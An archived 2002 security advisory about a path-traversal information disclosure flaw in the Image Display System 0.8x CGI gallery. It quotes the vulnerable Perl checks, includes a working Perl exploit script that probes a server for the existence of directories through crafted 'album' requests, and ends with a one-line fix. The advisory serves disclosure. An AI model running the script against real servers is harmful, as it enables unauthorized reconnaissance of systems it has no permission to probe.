TUCoPS :: Web :: Apps :: web5408.htm

TUCoPS :: Web :: Apps :: web5408.htm
Image Display System information disclosure vulnerability
5th Jun 2002 [SBWID-5408]
COMMAND

	IDS information disclosure vulnerability

SYSTEMS AFFECTED

	version 0.8x

PROBLEM

	isox@chainsawbeer.com pointed out:
	

	There is a information disclosure  vulnerability  in  IDS  0.8x  (assume
	other versions vulnerable). IDS is a  used  cgi  based  image  thumbnail
	gallery.  When  an  attacker  sends  the  variable  album  a   traversed
	directory (ie. /../../../../home/foobar) it is possible to tell  if  the
	specified directory exists by examining the returned  error  page.  This
	is possible do to the following snippit of code:
	

	

	idsShared.pm::getAlbumToDisplay()

	=================================

	    if ($albumtodisplay ne \'/\' && !-e $ppath . \"albums/$albumtodisplay\") { # does this album exist?

			bail (\"Sorry, the album \\\"$albumtodisplay\\\" doesn\'t exist: $!\");

	    }

	    

	    if ($albumtodisplay =~ /\\.\\./) { # hax0r protection...

			bail (\"Sorry, invalid directory name: $!\");

	    }

	

	

	 

	

	Also  note  there  is  the   same   type   of   information   disclosure
	vulnerability in index.cgi via the  following  code  (I  have  just  not
	verified if it is exploitable, although is obviously seems as though  it
	is):
	

	

	

	index.cgi::processData()

	========================

	  	if ($mode eq \'image\') {

		    getAlbumToDisplay();

			$imagetodisplay = $query->param(\'image\') || bail (\"Sorry, no image name was provided: $!\");

	  		

	

	  		unless (-e \"albums$albumtodisplay/$imagetodisplay\") { # does this album exist?

				bail (\"Sorry, the image \\\"albums$albumtodisplay/$imagetodisplay\\\" doesn\'t exist: $!\");

			}

		}

		

		if (($imagetodisplay =~ /\\.\\./) || ($albumtodisplay =~ /\\.\\./)) {

			bail (\"Directory/image paths must not include \\\"../\\\".\");

		}

	

	

	

	 Exploit

	 ========

	

	

	#!/usr/bin/perl -w # # ids-inform.pl  (05/27/2002)  #  #  Image  Display
	System 0.8x Information Disclosure Exploit. # Checks  for  existance  of
	specified directory. # # By: isox [isox@chainsawbeer.com] # #  #  usage:
	self explanitory # # my spelling: bad # # Hi Cody, You should be  proud,
	I coded for you! # Hi YpCat, Your perl is k-rad and pheersom. #  #######
	# URL # ####### # http://0xc0ffee.com # http://hhp-programming.net  #  #
	################# # Advertisement  #  #################  #  #  Going  to
	Defcon X this year? Well come to the  one  and  only  Dennys  at  Defcon
	breakfast. # This is quickly becoming  a  yearly  tradition  put  on  by
	isox.  Check 0xc0ffee.com for # more information. #
	

	$maxdepth = 30;
	

	&Banner;
	

	if ($#ARGV < 3) {
	  die(\"Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\\n\");

	}
	

	for($t=0; $t<$maxdepth; $t++) {
	  $dotdot = \"$dotdot\" . \"/..\";

	}
	

	$query            =            \"GET            $ARGV[1]\"             .
	\"?mode=album&album=$dotdot/$ARGV[0]\\n\\n\";      $blahblah       =
	&Directory($query, $ARGV[2], $ARGV[3]);
	

	if($blahblah =~ /Sorry, invalid directory name/) {
	  print(\"$ARGV[0] Exists.\\n\");

	} else {
	  print(\"$ARGV[0] Does Not Exist.\\n\");

	}
	

	exit 0;
	

	

	

	

	sub Banner {
	  print(\"IDS Information Disclosure Exploit\\n\");

	  print(\"Written by isox [isox\\@chainsawbeer.com]\\n\\n\");

	}
	

	

	sub Directory {
	  use IO::Socket::INET;

	

	  my($query, $host, $port) = @_;

	

	  $sock = new IO::Socket::INET (

	            PeerAddr => $host,

	            PeerPort => $port,

	            Timeout => 8,

	            Proto => \'tcp\'

	          );

	

	  if(!$sock) {

	    die(\"sock: timed out\\n\");

	  }

	

	  print $sock $query;

	  read($sock, $buf, 8192);

	  close($sock);

	

	  return $buf;

	}
	

SOLUTION

	The fix is simple, just flip the if statements around so it  checks  for
	..\'s first.